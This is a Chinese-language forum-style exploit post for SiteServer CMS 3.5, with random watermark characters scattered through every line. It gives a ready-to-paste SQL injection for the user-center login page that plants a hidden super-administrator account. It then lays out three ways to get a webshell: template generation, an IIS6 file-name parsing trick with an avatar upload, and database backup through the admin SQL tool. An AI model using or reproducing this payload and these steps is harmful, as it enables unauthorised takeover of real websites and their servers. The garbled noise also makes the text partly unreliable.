经测试秒杀最新的3.5版+ E; v0 G6 l" y
. Y4 _# k* K. @' {; Ustieserver官网:www.siteserver.cn3 m* o/ V9 p3 a# @# ?
9 m' s3 R% ^3 m% @. d2 ` L0 b: ?: x
. Q. q X3 r+ o( ?/ Z9 k/ ^: m% X% d
EXP:3 D6 H' k! t# z* V: f) T
* p+ t; C; x3 [/ c+ N# M4 @* {7 g
直接访问UserCenter/login.aspx
" x9 d7 @7 W& I9 i
- X' D# t5 q. ^# u6 I
y# W. Y% ^$ |" Q. S0 l- f# r; F0 a/ J7 v! ~
用户名处输入:- a5 o' h! c7 `8 X8 k) E
6 p4 Y' g3 U9 v2 S( P C& M/ d
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
" Z6 |6 Z- `* w! y+ T# C! C; q2 b; ^: Q7 ]6 @& x# J
$ v) D; V/ W" \2 \" V# _8 n; p6 d/ W8 G+ y; p# d v& [' l9 [
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。& ]! e2 K( r4 a; m9 O. B# x
& B) f6 O8 ]' ~7 I1 \7 W$ i # r6 I6 ?) Z3 c3 _+ P5 A d
8 I$ h [) F6 Z& g c
之后再访问后台SiteServer/login.aspx用插入的用户登陆 |1 N1 J+ s, Q2 p, c% @
7 @, n6 K s: v/ Q* W h
6 H0 h, C. Q( ?+ V" [' U* b
0 h' j1 T. b( T- ^5 O# D8 ?4 d
后台拿webshell的三种方法:
2 a" { x6 B& G; [- c }$ f) H: I5 _$ a5 d
一、: ^% Q+ G7 w7 ~0 v4 Z( l
% e& }2 V/ f% A! Y8 L1 x3 M6 J9 u站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
`! {! N& ~! }" D0 F. r. v A. z Y9 A
二、
5 _3 l7 ^$ q, K! m
8 A: X, W& o; _+ c5 t) O1 Z+ v' Y8 d, A成员权限-》添加用户-》用户名为:1.asp
/ ]+ K( m) w, W" Q! @& y- @* g, r2 E+ H5 Z) o6 w2 D
http://127.0.0.1/usercenter/
1 h6 ?- c9 p( I
$ ~. B2 `) p9 y9 `, O用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
x$ j! p$ k2 i3 S. s+ P. X4 l! P* T, G6 s* X
(ps:后台添加用户时不会验证是否含有非法字符)+ u4 G7 n, m* |& u
/ U' s' y7 ^$ h+ P- J5 g ~( u( n
三、
1 D2 _' V* k: I6 E$ n9 N- m& A1 A/ h+ c# }9 s; ^
系统工具-》实用工具-》机器参数查看
7 i6 L" V" e6 B; C可以看到数据库类型、名称,WEB路径
' m0 @; @% I7 T8 t# X0 S- _) U0 L4 |4 s* `# Q& S1 e" k: x5 \* M: M" U
系统工具-》数据库工具-》SQL语句查询
8 L# i) h6 j/ C这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
7 Z$ c' B/ E" ]! }1 A( m8 o! m" ~2 p0 b) Z5 {
|